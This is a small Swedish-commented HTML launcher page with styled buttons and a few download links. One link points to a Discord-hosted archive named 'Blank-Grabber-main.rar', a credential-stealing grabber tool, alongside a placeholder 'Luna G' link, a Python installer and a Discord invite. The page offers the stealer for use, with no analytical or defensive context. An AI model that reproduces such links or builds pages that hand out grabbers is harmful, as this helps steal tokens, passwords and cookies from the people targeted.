<!DOCTYPE html>
<html lang="sv">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>main page</title>
    <script type="text/javascript" src="function.js"></script>
    <style>
        body {
            background: url(mountain.jpg);
            background-repeat: no-repeat;
            background-attachment: fixed;
            background-size: 100% 100%;

        }

        .button3 {
            position: absolute; /* Positionera knappen absolut */
            top: 70px; /* Placera knappen 10px från toppen */
            left: 10px; /* Placera knappen 10px från vänster */
            width: 50px; /* Ange bredden på knappen */
            height: 50px; /* Ange höjden på knappen */
            border: none; /* Ta bort gränslinjen från knappen */
            border-radius: 50%; /* Gör knappen rund genom att använda border-radius */
            background-color: #0550f1; /* Ange bakgrundsfärgen på knappen */
            color: rgb(255, 255, 255); /* Ange textfärgen till vit */
            font-size: 16px; /* Ange fontstorleken */
            cursor: pointer; /* Ändra pekaren till en handpekare när användaren hovrar över knappen */
        }

        .button3:hover {
            background-color: #000000; /* Ändra bakgrundsfärgen på knappen vid hovring */
        }

        .button2 {
            position: absolute; /* Positionera knappen absolut */
            top: 10px; /* Placera knappen 10px från toppen */
            left: 10px; /* Placera knappen 10px från vänster */
            width: 50px; /* Ange bredden på knappen */
            height: 50px; /* Ange höjden på knappen */
            border: none; /* Ta bort gränslinjen från knappen */
            border-radius: 50%; /* Gör knappen rund genom att använda border-radius */
            background-color: #0550f1; /* Ange bakgrundsfärgen på knappen */
            color: rgb(255, 255, 255); /* Ange textfärgen till vit */
            font-size: 16px; /* Ange fontstorleken */
            cursor: pointer; /* Ändra pekaren till en handpekare när användaren hovrar över knappen */
        }

        .button2:hover {
            background-color: #000000; /* Ändra bakgrundsfärgen på knappen vid hovring */
        }
    

    </style>
    <link rel="stylesheet" type="text/css" href="style.css">



</head>
<body >
 	<button type="button" class="button3" onclick="inställningar()">⚙️</button>
     <button type="button" class="button2" onclick="tillbaka()">&#60;&#60;&#60</button>
    <a href="https://www.python.org/ftp/python/3.13.0/python-3.13.0a5-amd64.exe" style="--clr:#1e9bff"><span>python</span></a>
    <a href="https://cdn.discordapp.com/attachments/1207066029360939019/1210323492373921873/Blank-Grabber-main.rar?ex=66184917&is=6605d417&hm=eec41ee2b09db0d3edae7ba1909dd8288ca6c05f7bced0ad6d8af7bfca492b38&" style="--clr:#1e9bff"><span>Blank G</span></a>
    <a href="" style="--clr:#1e9bff"><span>Luna G</span></a>
    <a href="https://discord.gg/VWavSnvd" style="--clr:#1e9bff"><span>discord</span></a>
    <a href="" style="--clr:#1e9bff"><span>Casa Copy</span></a>
</body>
</html>
